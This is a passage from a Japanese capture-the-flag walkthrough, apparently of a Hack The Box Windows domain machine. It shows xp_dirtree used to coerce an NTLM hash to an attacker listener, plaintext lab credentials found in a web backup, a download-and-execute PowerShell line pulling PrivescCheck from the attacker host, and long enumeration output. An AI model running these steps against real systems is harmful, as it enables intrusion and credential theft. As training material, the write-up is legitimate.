Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
SMBでアクセスしていきます。
SQL (MANAGER\Operator guest@master)> xp_dirtree '\\10.10.14.23\relay'
[-] ERROR(DC01\SQLEXPRESS): Line 1: Incorrect syntax near '\'.
SQL (MANAGER\Operator guest@master)> exec master.dbo.xp_dirtree '\\10.10.14.23\relay'
subdirectory depth
------------ -----
SQL (MANAGER\Operator guest@master)>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.144.138
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:a3c1419ac9517cac:0DED6C16E7A8AFA572F871D7D21803B6:010100000000000000291D874B06DA01738D117355CF66A20000000002000800310039003800380001001E00570049004E002D00540058004A003900330058005A0047004E004500330004003400570049004E002D00540058004A003900330058005A0047004E00450033002E0031003900380038002E004C004F00430041004C000300140031003900380038002E004C004F00430041004C000500140031003900380038002E004C004F00430041004C000700080000291D874B06DA0106000400020000000800300030000000000000000000000000300000BB7386A595F53B3D1669E4B703F2FC0B2F23E80457C225A6729708228B7914A60A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320033000000000000000000
NT来ました!!!(ん?DC??サービスアカウントとかじゃないのか?)復号してみます!!!
┌──(root㉿kali)-[~/work]
└─# john --wordlist=./rockyou.txt hash
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
ダメだ。できない奴だ。
xp_dirtree
NTLM搾取が出来ないならxp_dirtree使って列挙するまでです。
列挙の仕方として、フォルダだけでなく、ファイルも出力してほしいので以下のサイトのオプションを参考にします。
列挙を試しているとc:\inetpub\wwwrootのWebの階層でうまく引っかかった。
SQL (MANAGER\Operator guest@master)> exec master.dbo.xp_dirtree 'c:\inetpub\wwwroot' ,0,1;
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
bootstrap.css 2 1
responsive.css 2 1
style.css 2 1
style.css.map 2 1
style.scss 2 1
images 1 0
about-img.png 2 1
body_bg.jpg 2 1
call-o.png 2 1
call.png 2 1
client.jpg 2 1
contact-img.jpg 2 1
envelope-o.png 2 1
envelope.png 2 1
hero-bg.jpg 2 1
location-o.png 2 1
location.png 2 1
logo.png 2 1
menu.png 2 1
next-white.png 2 1
next.png 2 1
offer-img.jpg 2 1
prev-white.png 2 1
prev.png 2 1
quote.png 2 1
s-1.png 2 1
s-2.png 2 1
s-3.png 2 1
s-4.png 2 1
search-icon.png 2 1
index.html 1 1
js 1 0
bootstrap.js 2 1
jquery-3.4.1.min.js 2 1
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
SQL (MANAGER\Operator guest@master)>
website-backup-27-07-23-old.zipのファイルが気になるので実際にWebにアクセスして落としてきます。
中身を解凍して確認すると、色々とファイルがあります。
.old-conf.xmlのファイルを確認します。
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
userとpasswordが記載されているので、Evil-winrmでログインしてみます。
きました!UserFlagゲットです!
特権昇格
調査
RustHound
BloodHoundの代わりにRustHoundを使います。DockerでBuildを済ませておけば特段exeを手動で送りこむ必要もなくささっとzipファイルが手に入るのでお手軽です。
Buildする場合は以下のコマンドを実行しましょう。
※これはちょっと時間かかります。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED
=> [internal] load build definition from Dockerfile 0.1s
=> => transferring dockerfile: 368B 0.0s
=> [internal] load .dockerignore 0.1s
=> => transferring context: 2B 0.0s
=> [internal] load metadata for docker.io/library/rust:1.64-slim-buster 2.9s
=> [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 18.7s
=> => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 0.0s
=> => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB 7.7s
=> => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B 0.0s
=> => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B 0.0s
=> => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB 0.0s
=> => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB 1.3s
=> => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 3.2s
=> => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 10.7s
=> [internal] load build context 0.1s
=> => transferring context: 532.71kB 0.0s
=> [2/6] WORKDIR /usr/src/rusthound 1.6s
=> [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m 28.6s
=> [4/6] COPY ./src/ ./src/ 0.1s
=> [5/6] COPY ./Cargo.toml ./Cargo.toml 0.1s
=> [6/6] RUN cargo install --path . 237.5s
=> exporting to image 6.9s
=> => exporting layers 6.9s
=> => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8 0.0s
=> => naming to docker.io/library/rusthound
Buildが出来ていればDockerでRustHoundを回します。
┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d manager.htb -i 10.129.144.30 -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
Initializing RustHound at 13:47:28 on 10/24/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-10-24T13:47:28Z INFO rusthound] Verbosity level: Info
[2023-10-24T13:47:29Z INFO rusthound::ldap] Connected to MANAGER.HTB Active Directory!
[2023-10-24T13:47:29Z INFO rusthound::ldap] Starting data collection...
[2023-10-24T13:47:31Z INFO rusthound::ldap] All data collected for NamingContext DC=manager,DC=htb
[2023-10-24T13:47:31Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-10-24T13:47:31Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-10-24T13:47:31Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-10-24T13:47:31Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 11 users parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 61 groups parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 1 computers parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 1 ous parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 1 domains parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] 21 containers parsed!
[2023-10-24T13:47:31Z INFO rusthound::json::maker] /tmp/htb/20231024134731_manager-htb_rusthound.zip created!
RustHound Enumeration Completed at 13:47:31 on 10/24/23! Happy Graphing!
続いてneo4jとbloodhoundを起動します。
┌──(root㉿kali)-[~]
└─# neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-10-24 13:48:09.063+0000 INFO Starting...
2023-10-24 13:48:10.303+0000 INFO This instance is ServerId{943c822e} (943c822e-2b68-4657-8641-4e17a9052434)
2023-10-24 13:48:12.212+0000 INFO ======== Neo4j 4.4.26 ========
2023-10-24 13:48:14.941+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-10-24 13:48:14.961+0000 INFO Setting up initial user from defaults: neo4j
2023-10-24 13:48:14.962+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-10-24 13:48:14.986+0000 INFO Setting version for 'security-users' to 3
2023-10-24 13:48:14.989+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-10-24 13:48:14.993+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-10-24 13:48:15.578+0000 INFO Bolt enabled on localhost:7687.
2023-10-24 13:48:18.009+0000 WARN The client is unauthorized due to authentication failure.
2023-10-24 13:48:18.263+0000 INFO Remote interface available at http://localhost:7474/
2023-10-24 13:48:18.276+0000 INFO id: 139452289A7629BDFCF98C634413FBAA52FD74408C9293012C8B5425A9878DF3
2023-10-24 13:48:18.276+0000 INFO name: system
2023-10-24 13:48:18.277+0000 INFO creationDate: 2023-10-24T13:48:13.182Z
2023-10-24 13:48:18.277+0000 INFO Started.
┌──(root㉿kali)-[~]
└─# bloodhound
(node:7802) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:7900) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
特段気になるものはなかった。
winPeas
以下からwinPeasのbatファイルをダウンロードし、対象端末上で実行する。
*Evil-WinRM* PS C:\Users\Raven\Documents> .\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission. '
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
...省略
ÉÍÍÍÍÍÍÍÍÍ͹ Current UDP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP 0.0.0.0 123 *:* 1036 svchost
UDP 0.0.0.0 389 *:* 644 lsass
UDP 0.0.0.0 5353 *:* 1164 svchost
UDP 0.0.0.0 5355 *:* 1164 svchost
UDP 10.129.144.138 88 *:* 644 lsass
UDP 10.129.144.138 137 *:* 4 System
UDP 10.129.144.138 138 *:* 4 System
UDP 10.129.144.138 464 *:* 644 lsass
UDP 127.0.0.1 52117 *:* 1328 certsrv
UDP 127.0.0.1 55064 *:* 2224 Microsoft.ActiveDirectory.WebServices
UDP 127.0.0.1 55068 *:* 2612 dfsrs
UDP 127.0.0.1 55071 *:* 1456 svchost
UDP 127.0.0.1 55269 *:* 2836 ismserv
UDP 127.0.0.1 57557 *:* 644 lsass
UDP 127.0.0.1 63083 *:* 1416 svchost
UDP 127.0.0.1 63229 *:* 3988 WmiPrvSE
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP [::] 123 *:* 1036 svchost
ÉÍÍÍÍÍÍÍÍÍ͹ Firewall Rules
È Showing only DENY rules (too many ALLOW rules always)
Current Profiles: DOMAIN
FirewallEnabled (Domain): True
FirewallEnabled (Private): True
FirewallEnabled (Public): True
DENY rules:
[X] Exception: Object reference not set to an instance of an object.
...省略
certsrv...これはあれでは???
まぁ他も見てみるか。
PrivescCheck
以下のリポジトリからPoewershellを拾ってきます。
*Evil-WinRM* PS C:\Users\Raven\Documents> IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.23/PrivescCheck.ps1'); Invoke-PrivescCheck
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance ┃
┃ NAME ┃ User identity ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the current user (name, domain name) ┃
┃ and its access token (SID, integrity level, authentication ┃
┃ ID). ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (1 finding)
Name : MANAGER\Raven
SID : S-1-5-21-4078382237-1492182817-2568127209-1116
IntegrityLevel : Medium Plus Mandatory Level (S-1-16-8448)
SessionId : 0
TokenId : 00000000-01c8964c
AuthenticationId : 00000000-01c892f2
OriginId : 00000000-00000000
ModifiedId : 00000000-01c892f9
Source : NtLmSsp (00000000-00000000)
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance ┃
┃ NAME ┃ User groups ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the groups the current user belongs to ┃
┃ (name, type, SID). ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (11 findings)
Name Type SID
---- ---- ---
MANAGER\Domain Users Group S-1-5-21-4078382237-1492182817-2568127209-513
Everyone WellKnownGroup S-1-1-0
BUILTIN\Remote Management Users Alias S-1-5-32-580
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574
NT AUTHORITY\NETWORK WellKnownGroup S-1-5-2
NT AUTHORITY\Authenticated Users WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization WellKnownGroup S-1-5-15
NT AUTHORITY\NTLM Authentication WellKnownGroup S-1-5-64-10
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ User privileges ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has privileges (e.g., ┃
┃ SeImpersonatePrivilege) that can be leveraged for privilege ┃
┃ escalation to SYSTEM. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access ┃
┃ NAME ┃ User environment variables ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether any environment variables contain sensitive ┃
┃ information such as credentials or secrets. Note that this ┃
┃ check follows a keyword-based approach and thus might not be ┃
┃ completely reliable. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Non-default services ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by ┃
┃ parsing the target executable s metadata and checking ┃
┃ whether the publisher is Microsoft. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (9 findings)
Name : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User : NT Service\MSSQL$SQLEXPRESS
StartMode : Automatic
Name : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User : NT AUTHORITY\NETWORKSERVICE
StartMode : Disabled
Name : SQLBrowser
DisplayName : SQL Server Browser
ImagePath : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User : NT AUTHORITY\LOCALSERVICE
StartMode : Disabled
Name : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode : Automatic
Name : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User : LocalSystem
StartMode : Automatic
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\Windows\System32\OpenSSH\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User : LocalSystem
StartMode : Automatic
Name : vm3dservice
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath : C:\Windows\system32\vm3dservice.exe
User : LocalSystem
StartMode : Automatic
Name : VMTools
DisplayName : VMware Tools
ImagePath : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User : LocalSystem
StartMode : Automatic
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Vulnerable Kernel drivers ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether known vulnerable kernel drivers are installed. ┃
┃ It does so by computing the file hash of each driver and ┃
┃ comparing the value against the list provided by ┃
┃ loldrivers.io. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
Warning: Service: MpKsla7af4902 | Path not found: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4F476386-9BFC-43EC-A5E5-008D5A29EFE0}\MpKslDrv.sys
Warning: Service: vwifibus | Path not found: C:\Windows\System32\drivers\vwifibus.sys
[*] Result: Nothing found
...省略
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0008 - Lateral Movement ┃
┃ NAME ┃ UAC settings ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether User Access Control (UAC) is enabled and ┃
┃ whether it filters the access token of local administrator ┃
┃ accounts when they authenticate remotely. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (3 findings)
Key : HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value : EnableLUA
Data : 1
Vulnerable : False
Description : UAC is enabled.
Key : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value : LocalAccountTokenFilterPolicy
Data : (null)
Vulnerable : False
Description : Only the built-in Administrator account (RID 500) can be granted a high integrity token when authenticating remotely (default).
Key : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value : FilterAdministratorToken
Data : (null)
Vulnerable : True
Description : The built-in administrator account (RID 500) is granted a high integrity token when authenticating remotely (default).
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access ┃
┃ NAME ┃ LSA Protection ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether LSA protection is enabled. Note that when LSA ┃
┃ protection is enabled, 'lsass.exe' runs as a Protected ┃
┃ Process Light (PPL) and thus can only be accessed by other ┃
┃ protected processes with an equivalent or higher protection ┃
┃ level. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)
Key : HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value : RunAsPPL
Data : (null)
Description : LSA protection is not enabled.
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access ┃
┃ NAME ┃ Credential Guard ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether Credential Guard is supported and enabled. ┃
┃ Note that when Credential Guard is enabled, credentials are ┃
┃ stored in an isolated process ('LsaIso.exe') that cannot be ┃
┃ accessed, even if the kernel is compromised. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)
DeviceGuardSecurityServicesConfigured : (null)
DeviceGuardSecurityServicesRunning : (null)
Description : Credential Guard is not configured. Credential Guard is not running.
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0003 - Persistence ┃
┃ NAME ┃ UEFI & Secure Boot ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether UEFI and Secure Boot are supported and ┃
┃ enabled. Note that Secure Boot requires UEFI. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (2 findings)
Name Vulnerable Description
---- ---------- -----------
UEFI False BIOS mode is UEFI.
Secure Boot True Secure Boot is not enabled.
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0008 - Lateral Movement ┃
┃ NAME ┃ LAPS ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether LAPS is configured and enabled. Note that this ┃
┃ applies to domain-joined machines only. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Medium (1 finding)
Key : HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd
Value : AdmPwdEnabled
Data : (null)
Description : LAPS is not configured.
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0001 - Initial Access ┃
┃ NAME ┃ BitLocker configuration ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether BitLocker is enabled on the system drive and ┃
┃ requires a second factor of authentication (PIN or startup ┃
┃ key). Note that this check might yield a false positive if a ┃
┃ third-party drive encryption software is installed. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ PATH folder permissions ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on ┃
┃ the system-wide PATH folders. If so, the system could be ┃
┃ vulnerable to privilege escalation through ghost DLL ┃
┃ hijacking. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Known ghost DLLs ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about services that are known to be prone to ┃
┃ ghost DLL hijacking. Note that their exploitation requires ┃
┃ the current user to have write permissions on at least one ┃
┃ system-wide PATH folder. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (4 findings)
Name : cdpsgshims.dll
Description : Loaded by the Connected Devices Platform Service (CDPSvc) upon startup.
RunAs : NT AUTHORITY\LocalService
RebootRequired : True
Link : https://nafiez.github.io/security/eop/2019/11/05/windows-service-host-process-eop.html
Name : WptsExtensions.dll
Description : Loaded by the Task Scheduler service (Schedule) upon startup.
RunAs : LocalSystem
RebootRequired : True
Link : http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
Name : SprintCSP.dll
Description : Loaded by the Storage Service (StorSvc) when the RPC procedure 'SvcRebootToFlashingMode' is invoked.
RunAs : LocalSystem
RebootRequired : False
Link : https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc
Name : wlanapi.dll
Description : Loaded by the Network Connections service (NetMan) when listing network interfaces.
RunAs : LocalSystem
RebootRequired : False
Link : https://itm4n.github.io/windows-server-netman-dll-hijacking/
...省略
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Driver co-installers ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether Driver Co-installers are disabled. A local ┃
┃ user might be able to gain SYSTEM privileges by plugging in ┃
┃ a device such as a mouse or keyboard with a vulnerable ┃
┃ Driver Co-installer. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Vulnerable - Low (1 finding)
Key : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer
Value : DisableCoInstallers
Data : (null)
Description : Driver Co-installers are not disabled (default).
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
